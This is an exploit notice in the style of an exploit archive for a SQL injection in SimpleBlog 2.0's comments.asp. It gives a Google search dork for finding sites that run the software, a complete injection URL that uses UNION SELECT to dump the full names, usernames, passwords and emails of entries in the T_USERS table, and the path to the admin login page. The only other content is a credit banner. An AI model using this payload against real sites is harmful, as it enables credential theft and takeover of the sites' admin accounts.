######################################################################## ######## ## ## ## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## Credit by | Chironex Fleckeri ## ## Mail | ChironeX.FleckeriX (at) Gmail (dot) Com [email concealed] ## ## Googledork | Powered By SimpleBlog 2.0 ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## ## ######################################################################## ######## ######################################################################## ######################################################################## #### #http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 # ######################################################################## ######################################################################## #### ########################################################### #Admin Panel : http://www.target.com/path/admin/login.asp # ###########################################################